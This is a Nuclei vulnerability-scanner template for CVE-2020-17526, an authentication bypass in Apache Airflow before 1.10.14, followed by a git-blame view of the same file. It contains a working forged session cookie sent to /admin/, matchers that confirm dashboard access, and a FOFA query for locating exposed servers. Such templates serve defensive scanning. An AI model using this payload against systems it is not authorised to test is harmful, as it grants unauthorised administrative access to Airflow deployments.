nuclei-templates/cves/2020/CVE-2020-17526.yaml

id: CVE-2020-17526

info:
  name: Apache Airflow < 1.10.14 - Authentication Bypass
  author: piyushchhiroliya
  severity: high
  description: |
    Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
  reference:
    - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17526
  classification:
    cve-id: CVE-2020-17526
  metadata:
    verified: true
    fofa-query: "Apache Airflow"
  tags: cve,cve2020,apache,airflow,auth-bypass

requests:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "DAG"
          - "Recent Tasks"
          - "Users"
          - "SLA Misses"
          - "Task Instances"
        condition: and

      - type: dsl
        dsl:
          - "contains(body_1, 'Redirecting...')"
          - "status_code_1 == 302"
        condition: and
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`id: CVE-2020-17526`

			`info:`
Update CVE-2020-17526.yaml 2022-08-25 13:46:09 +00:00			`name: Apache Airflow < 1.10.14 - Authentication Bypass`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`author: piyushchhiroliya`
			`severity: high`
Update CVE-2020-17526.yaml 2022-08-25 13:46:09 +00:00			`description: \|`
			`Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`reference:`
Update CVE-2020-17526.yaml 2022-08-25 13:46:09 +00:00			`- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-17526`
			`classification:`
			`cve-id: CVE-2020-17526`
Update CVE-2020-17526.yaml 2022-08-25 13:46:09 +00:00			`metadata:`
			`verified: true`
			`fofa-query: "Apache Airflow"`
			`tags: cve,cve2020,apache,airflow,auth-bypass`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /admin/ HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2020-17526.yaml 2022-08-30 10:45:32 +00:00
			`- \|`
			`GET /admin/ HTTP/1.1`
			`Host: {{Hostname}}`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY`

Update CVE-2020-17526.yaml 2022-08-30 10:45:32 +00:00			`req-condition: true`
fixed invalid matcher 2022-08-25 10:56:54 +00:00			`matchers-condition: and`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`matchers:`
			`- type: word`
Update CVE-2020-17526.yaml 2022-08-30 10:45:32 +00:00			`part: body_2`
CVE-2020-17526.yaml added 2022-08-25 10:16:13 +00:00			`words:`
			`- "DAG"`
			`- "Recent Tasks"`
			`- "Users"`
			`- "SLA Misses"`
			`- "Task Instances"`
			`condition: and`
fixed invalid matcher 2022-08-25 10:56:54 +00:00
Update CVE-2020-17526.yaml 2022-08-30 10:45:32 +00:00			`- type: dsl`
			`dsl:`
			`- "contains(body_1, 'Redirecting...')"`
			`- "status_code_1 == 302"`
			`condition: and`